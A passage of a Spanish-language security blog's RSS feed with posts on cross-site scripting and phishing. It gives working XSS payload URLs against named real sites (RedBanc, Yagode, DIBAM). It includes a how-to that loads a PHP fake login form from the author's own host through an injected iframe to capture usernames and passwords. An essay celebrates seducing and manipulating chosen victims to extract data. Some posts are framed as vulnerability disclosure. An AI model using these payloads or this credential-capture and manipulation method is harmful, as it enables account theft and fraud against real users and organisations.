<code>http://www.redbanc.cl/portal_redbanc/browse?pagina=&lt;script&gt;alert('XSS')&lt;/script&gt;</code></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/02/poc_redbanc_xss.png"><img src="http://blog.zerial.org/wp-content/uploads/2010/02/poc_redbanc_xss.png" alt="" title="poc_redbanc_xss" width="364" height="208" class="aligncenter size-full wp-image-1591" /></a></p>
<p>Inyectando un <em>iframe</em> con destino a otro sitio, el cual podría contener un sitio web maligno:<br />
<code>http://www.redbanc.cl/portal_redbanc/browse?pagina=&lt;iframe src=http://sitio.web&lt;/iframe&gt;&lt;/iframe&gt;</code></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/02/poc_redbanc_iframe.png"><img src="http://blog.zerial.org/wp-content/uploads/2010/02/poc_redbanc_iframe-300x135.png" alt="" title="poc_redbanc_iframe" width="300" height="135" class="aligncenter size-medium wp-image-1592" /></a><br />
(más información sobre este último punto en: <a href="http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/">Haciendo phishing explotando una vulnerabilidad XSS</a>)</p>
<p>He intentado contactarme con los encargados del desarrollo del sitio pero no he obtenido respuesta. El formulario de contacto del mismo sitio web no funciona y he estado enviando correos a info@redbanc.cl (correo que aparece en el sitio web) y ni si quiera me han respondido que leyeron el correo.</p>
<h3>Los riesgos</h3>
<p>Los chilenos bien saben lo que es RedBanc y deberían imaginar los peligros que puede significar un fallo de este tipo en el sitio web oficial.<br />
Explotando esta vulnerabilidad es posible robar la identidad de personas y obtener información privadas tales como nombres, rut, telefonos, números de cuenta bancaria y claves de acceso. Tratandose de un sitio web que tiene directa relacion con los bancos y tarjetas de débito es posible tambien obtener los dígitos del PIN PASS, usando un poco de <em>ingenieria social</em> y engañando a los usuarios con falsos e identicos sitios y formularios.</p>
<h3>Aclaración</h3>
<p>La vulnerabilidad fue avisada el Jueves de la semana pasada por primera vez, luego intente contactarme con ellos el día Lunes y tambien el Martes y, siendo Jueves, aún no he obtenido ninguna respuesta, ni si quiera acusando que el correo que les envié fue recibido.</p>
<p><strong>ACTUALIZACIóN &#8211; 5/Mar/2010 12:30</strong><br />
Luego de numerosos correos enviados a la gente de redbanc reportando el error y sin obtener ninguna respuesta, decidí publicar este artículo y parece que ha dado resultado, porque la gente de <a href="http://www.redbanc.cl">Redbanc</a> ya ha <strong>solucionado</strong> el problema, obviamente sin agradecer y sin emitir ningun tipo de comentario al respecto, simpemente solucionaron el problema como si nada ha pasado.<br />
Buscando en Google me he dado cuenta que este sitio ha tenido esta misma vulnerabilidad en distintos scripts y y redbanc nunca dijo nada.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/"  data-text="Grave vulnerabilidad del tipo Cross-Site Scripting en sitio web de RedBanc" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>Haciendo phishing explotando una vulnerabilidad XSS</title>
		<link>http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/</link>
		<comments>http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/#comments</comments>
		<pubDate>Wed, 23 Dec 2009 23:41:38 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1321</guid>
		<description><![CDATA[Usaré de ejemplo un sitio que ya he usado en alguno de mis post, cuando hice los tests a las empresas de hosting. Mostraré cómo explotar una vulnerabilidad del tipo XSS para hacer phishing, capturar datos de acceso de usuarios para ganar acceso a un sistema, ftp , email, etc. La empresa afectada es una [...]]]></description>
			<content:encoded><![CDATA[<p>Usaré de ejemplo un sitio que ya he usado en <a href="http://blog.zerial.org/seguridad/empresas-de-hosting-y-diseno-web-al-descubierto-dch/" target="_blank">alguno de mis post</a>, cuando hice los <a href="http://blog.zerial.org/seguridad/testing-de-calidad-a-las-empresas-de-hosting-y-desarrollo-web-en-chile/" target="_blank">tests a las empresas de hosting</a>. Mostraré cómo explotar una vulnerabilidad del tipo XSS para hacer phishing, capturar datos de acceso de usuarios para ganar acceso a un sistema, ftp , email, etc.</p>
<p>La empresa afectada es una <a href="http://www.yagode.cl" target="_blank">inmobiliaria y constructora &#8220;Yagode&#8221;</a>, la vulnerabilidad XSS se encuentra en el script &#8220;<em>proyectos.php</em>&#8220;, al no parsear la variable <em>tipo</em>. Tiene protección contra XSS, pero no es efectiva. Podemos comprobar ingresando a</p>
<blockquote><p><a href="http://www.yagode.cl/proyectos.php?Tipo=&lt;script&gt;alert(this)&lt;/script&gt;" target="_blank"><strong>http://www.yagode.cl/proyectos.php?Tipo=&lt;script&gt;alert(this)&lt;/script&gt;</strong></a></p></blockquote>
<p>Obtenemos el mensaje de error <strong>406 &#8220;Not Acceptable&#8221;</strong>,</p>
<blockquote>
<h2>Not Acceptable</h2>
<p>An appropriate representation of the requested resource /proyectos.php could not be found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></blockquote>
<p>Sin embargo, permite incluir otro tipo de código como un <strong>iframe</strong>.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2009/12/xss.png"><img class="aligncenter size-medium wp-image-1331" title="xss" src="http://blog.zerial.org/wp-content/uploads/2009/12/xss-300x193.png" alt="" width="300" height="193" /></a></p>
<p><span id="more-1321"></span></p>
<p>Vamos a armar un pequeño código en php con un formulario que nos capture la información, simulando un login, bien simple, que cumpla con el estándar del sitio web (fondo azúl y <strong>bien feo</strong>)</p>
<pre name="code" class="php"><html>
<body bgcolor=#0248BC>
< ?php
if($_GET['login'] == "ok")
        die("user: ".$_POST['user']."pass: ".$_POST['pass']);
?>
<form method="post" action="?login=ok">
Usuario:
<input type="text" name="user"/>
Password:
<input type="password" name="pass"/>
<input type=submit value=Ingresar/>
</form>

</body>
</html>
</pre>
<p>Incluimos nuestro script en el iframe:</p>
<p><a href="http://www.yagode.cl/proyectos.php?Tipo=&lt;iframe frameborder=0 src=http://zerial.org/yagode.php width=500 height=200&lt;/iframe&gt;" target="_blank">http://www.yagode.cl/proyectos.php?Tipo=&lt;iframe frameborder=0 src=http://zerial.org/yagode.php width=500 height=200&lt;/iframe&gt;</a></p>
<p>Ingresamos nuestra información, usuario y contraseña, y vemos como el script php que hicimos se encarga de guardar la información y mostrarla, llenamos el formulario con datos de prueba como usuario=miusuario y password=mipassword, al presionar el botón &#8220;<em>ingresar</em>&#8220;, veremos la siguiente pantalla:</p>
<p><img class="aligncenter size-full wp-image-1337" title="xss2" src="http://blog.zerial.org/wp-content/uploads/2009/12/xss2.png" alt="" width="306" height="229" /></p>
<p><img class="aligncenter size-full wp-image-1338" title="xss3" src="http://blog.zerial.org/wp-content/uploads/2009/12/xss3.png" alt="" width="224" height="179" /></p>
<p>Perfectamente podemos <strong>engañar</strong> a los empleados o clientes de ésta empresa, para que ingresen a éste sitio y nos entreguen información <strong>confidencial</strong>. Con un poco de ingeniería social y tiempo.</p>
<p><strong>NOTA: La empresa encargada de éste sitio fue notificada de los fallos hace mucho tiempo (más de 2 meses)</strong></p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/"  data-text="Haciendo phishing explotando una vulnerabilidad XSS" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>El arte del &#8216;phishing&#8217;</title>
		<link>http://blog.zerial.org/seguridad/el-arte-del-phishing/</link>
		<comments>http://blog.zerial.org/seguridad/el-arte-del-phishing/#comments</comments>
		<pubDate>Mon, 21 Dec 2009 23:45:46 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Historias]]></category>
		<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[bancos]]></category>
		<category><![CDATA[fraudes]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[robos]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1302</guid>
		<description><![CDATA[Sin duda el phishing es una de las técnicas más usadas actualmente para el robo de información y suplantación de identidad, pero debemos reconocer que es todo un arte. Para quienes no saben lo que es el phishing, les extraigo lo siguiente desde la wikipedia: ﻿Phishing es un término informático que denomina un tipo de [...]]]></description>
			<content:encoded><![CDATA[<p>Sin duda el <em>phishing</em> es una de las técnicas más usadas actualmente para el robo de información y suplantación de identidad, pero debemos reconocer que es todo un arte. Para quienes no saben lo que es el phishing, les extraigo lo siguiente desde la wikipedia:</p>
<blockquote><p>﻿<strong>Phishing</strong> es un término <a title="Informático" href="http://es.wikipedia.org/wiki/Inform%C3%A1tico">informático</a> que denomina un tipo de <a title="Delito" href="http://es.wikipedia.org/wiki/Delito">delito</a> encuadrado dentro del ámbito de las <a title="Estafa" href="http://es.wikipedia.org/wiki/Estafa">estafas</a> cibernéticas, y que se comete mediante el uso de un tipo de <a title="Ingeniería social (seguridad informática)" href="http://es.wikipedia.org/wiki/Ingenier%C3%ADa_social_%28seguridad_inform%C3%A1tica%29">ingeniería social</a> caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una <a title="Contraseña" href="http://es.wikipedia.org/wiki/Contrase%C3%B1a">contraseña</a> o información detallada sobre <a title="Tarjeta de crédito" href="http://es.wikipedia.org/wiki/Tarjeta_de_cr%C3%A9dito">tarjetas de crédito</a> u otra información bancaria).</p></blockquote>
<p><a href="http://blog.zerial.org/wp-content/uploads/2009/12/phishing.jpg"><img class="alignleft size-full wp-image-1304" title="phishing" src="http://blog.zerial.org/wp-content/uploads/2009/12/phishing.jpg" alt="" width="265" height="270" /></a>Como dice la definición, son técnicas que se aplican mediante <strong>ingeniería social</strong> y ésta es, por si misma, un arte.<br />
Podemos detectar distintos tipos de phishing, desde uno muy simple como falsificar un sitio y lanzarlo al mundo para que la gente caiga o bien uno más complejo con objetivos determinados y con víctimas específicas. En el primer tipo, me gustaría hacer referencia a todos los conocidos ataques que se han hecho a bancos simplemente falsificando el sitio web y obteniendo información de gente al azar, por ejemplo el <a href="http://blog.segu-info.com.ar/2009/12/mas-phishing-para-mastercard.html" target="_blank">caso en que se vio envuelto Mastercard Argentina</a>. Con el segundo tipo, quiero hacer referencia a casos más trascendentes que generalmente no son conocidos, ya que no afectan a mucha gente sino mas bien a una víctima específica. Para mi, el primer tipo es una <strong>mierda</strong>, sin embargo, me gustaría destacar los ataques del segúndo tipo. De ahora en adelante, los distinguiré según su tipo.</p>
<p><span id="more-1302"></span></p>
<p>Primero, voy a entrar en detalles con el <em>phishing</em> de <strong>primer tipo.</strong> Cualquier persona con mínimos conocimientos en desarrollo puede copiar una página y conseguirse un dominio similar al original para hospedarla y lanzarla al mundo para ver quienes caen, generalmente con estos tipos de ataques no sabes quienes son las personas que caen en tu trampa, simplemente obtienes sus datos para fastidiarles, ingresas a sus cuentas y ver si tiene algo <em>entretenido</em>, no tiene ninguna ciencia. Este tipo de ataques no tienen ningún sentido, no se está aplicando ingeniería social ni mucho menos.<br />
Existe una <strong>gran</strong> diferencia entre dirigir los ataques a una persona o víctima en particular versus el direccionarlo a quien caiga: la dificultad y la emoción.</p>
<p>El <strong>segúndo tipo</strong> es en el que quiero profundizar más. Cuando tenemos una víctima en la mira, es mucho más emocionando hacer éste tipo de ataques, ya que nos costará más y nuestro fín es único, no afectará a otras personas quienes no nos interesa. Para hacer ataques dirigidos, tenemos distintas técnicas, desde ataques locales hasta ataques remotos, podemos hacernos pasar por otra persona, engañando a nuestra víctima para que crea lo que nosotros queremos que crea y así obtener lo que queremos, hasta podemos manipularla. La víctima debe pensar que somos alguien de confianza, que se mueve dentro de su círculo de amigos o conocidos, sabemos mucho de ella y ella <em>cree</em> saber mucho de nosotros. Hacer que la víctima confíe en nosotros toma mucho tiempo, hace que haga lo que nosotros queremos más aún. Se puede lograr desde ataques sicológicos hasta con ataques netamente <em>informáticos</em> pero sin duda lo mejor es una combinación de ambos. Generalmente las víctimas de éste tipo de ataque son conocidos (nosotros lo conocemos, pero muchas veces él a nosotros no) a menos que sea por <a href="http://blog.zerial.org/seguridad/algo-asi-como-un-asesino-a-sueldo/" target="_blank">encargo</a>.<br />
La captura de datos o información se puede lograr falsificando websites, por teléfono, en persona, mediante algun tipo de mensajería instantanea, <em>sniffeando</em> la red, etc. Todo va a depender de nuestra imaginación, conocimiento y capacidades.</p>
<p><img class="alignright size-medium wp-image-1315" title="target" src="http://blog.zerial.org/wp-content/uploads/2009/12/target_poker-240x300.jpg" alt="" width="142" height="178" />Cuando tenemos una víctima elegida, es muy entretenido el proceso en el cual hay que seducirla y mucho más aún, cuando la persona cae en nuestro juego y una véz obtenida la información es mucho más emocionante aún. Luego es el proceso de la verificación de información y posteriormente, una des-seducción de nuestra víctima, es decir, hacer que poco a poco se vaya alejando, pero sin perder el control de la situación y obviamente, sin pretender que nuestro objetivo se de cuenta de lo que planeamos hacer. Lo mejor es confundirlo.<br />
No siempre se logra el objetivo, aveces porque nuestras técnicas han fallado y otras veces porque la persona que elegimos como víctima no es tan fácil de seducir. Hay que saber en qué momento abortar misión, porque los afectados podemos ser nosotros.</p>
<p>Existe un concepto errado de lo que es el phishing, al igual que muchas cosas, la popularidad de los términos terminan deformandose. Para mucha gente éste término es sinónimo de &#8220;<em>robo de cuenta del banco y transferencias de dinero ilícitas</em>&#8220;, que sería la definición <strong>peyorativa</strong>.<br />
Detrás de muchos <strong>hackeos</strong> existen, implícita o explícitamente, técnicas de phishing aplicadas sobre las víctimas, y no podemos desperdiciar todo el <em>proceso pensante</em> y las capacidades del atacante para elaborar un ataque de ésta magnitud.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-arte-del-phishing%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/el-arte-del-phishing/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/el-arte-del-phishing/"  data-text="El arte del &#8216;phishing&#8217;" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/el-arte-del-phishing/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>El phishing y la poca preocupación para combatirlo</title>
		<link>http://blog.zerial.org/seguridad/el-phishing-y-la-poca-preocupacion-para-combatirlo/</link>
		<comments>http://blog.zerial.org/seguridad/el-phishing-y-la-poca-preocupacion-para-combatirlo/#comments</comments>
		<pubDate>Thu, 30 Jul 2009 02:50:13 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=695</guid>
		<description><![CDATA[El phishing es una de las técnicas de robo de identidad e información más fácil de explotar, no porque el hacerlo sea sencillo, sino por las empresas y la gente que no se preocupa de proteger su información. Si bien esta técnica muchas veces requiere de ingenieria social (más aún cuando es un ataque dirigido), [...]]]></description>
			<content:encoded><![CDATA[<p>El <em>phishing</em> es una de las técnicas de robo de identidad e información más fácil de explotar, no porque el hacerlo sea sencillo, sino por las empresas y la gente que no se preocupa de proteger su información. Si bien esta técnica muchas veces requiere de ingenieria social (más aún cuando es un ataque dirigido), conocimientos <em>basicos</em> de programación y/o diseño o desarrollo web, es explotado muchas veces por personas no muy expertas y no necesariamente &#8220;hackers&#8221;.<br />
El <em>phishing</em> se puede lograr de varias formas, entre las más conocidas están la duplicación de sitios web y mediante la <a href="http://blog.zerial.org/?s=xss" target="_blank">vulnerabilidad <strong>XSS</strong></a>. Esta última facilita a la anterior.</p>
<p>Básicamente, <strong>¿Qué es el phishing?</strong></p>
<p>Definamos phishing como una tecnica de &#8220;pesca&#8221; para robar información privada/personal de personas y/o empresas.</p>
<p><strong>¿Cómo se lleva acabo esta técnica?</strong></p>
<p>Puede resultar tan sencillo como intentar engañar a un niño, pues hacemos creer a una persona algo que no lo es con la finalidad de que esta persona nos entregue datos confidenciales y/o privados, por ejemplo, mediante un formulario de login a un sistema (universidad, banco, etc) falsificado.</p>
<p><span id="more-695"></span></p>
<p>A las empresas parece importarle poco el tema de seguridad en este aspecto, segun mi experiencia y estudios realizados por mi (ver en este blog), la vulnerabilidad XSS es una de las más comunes y es la que nos permite robar informacion de muchas formas usando la identidad de la empresa/sitio web vulnerable.</p>
<p>Tomemos como ejemplo una de las páginas que he publicado con este vulnerabilidad, que aun no lo solucionan. Corresponde al sitio web de la <a href="http://www.dibam.cl" target="_blank">&#8220;Direccion de bibliotecas, archivos y museos&#8221; DIBAM</a>, la URI vulnerable es:<br />
<a href="http://www.dibam.cl/error.asp?cadena=a&amp;pagina=" target="_blank">http://www.dibam.cl/error.asp?cadena=a&amp;pagina=<strong>[XSS]</strong></a></p>
<p>Podemos insertar cualquier código javascript o html, como prueba de concepto vamos a insertar un iframe apuntando a google:</p>
<p><a href="http://www.dibam.cl/error.asp?cadena=a&amp;pagina=%3Ciframe%20src=http://google.cl%20frameborder=0%20width=660%3E%3C/iframe%3E" target="_blank">http://www.dibam.cl/error.asp?cadena=a&amp;pagina=%3Ciframe%20src=http://google.cl%20frameborder=0%20width=660%3E%3C/iframe%3E</a></p>
<p><img class="aligncenter size-full wp-image-698" title="dibam-1" src="http://blog.zerial.org/wp-content/uploads/2009/07/dibam-1.png" alt="dibam-1" width="462" height="302" /></p>
<p>De este mismo modo, pudimos haber hecho referencia a un sitio con un login modificado, haciendonos pasar por &#8220;dibam&#8221; y pidiendo informacion privada a usuarios. De esta misma forma, podemos hacer referencia desde el siti o&#8221;dibam.cl&#8221; a algun fichero infectado con algun troyano, virus, etc.</p>
<p>Respecto al javascript, todo codigo javascript ejecutado si bien se ejecuta en por el lado del cliente, lo que no significa ningun riesgo para el servidor, hay que dejar en claro que todo el código javascritp será ejecutado en el contexto del sitio web, por lo que será posible el acceso a cookies, etc lo que nos permitirá robar las cookies para logearnos en algún sistema.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-phishing-y-la-poca-preocupacion-para-combatirlo%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/el-phishing-y-la-poca-preocupacion-para-combatirlo/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/el-phishing-y-la-poca-preocupacion-para-combatirlo/"  data-text="El phishing y la poca preocupación para combatirlo" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/el-phishing-y-la-poca-preocupacion-para-combatirlo/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

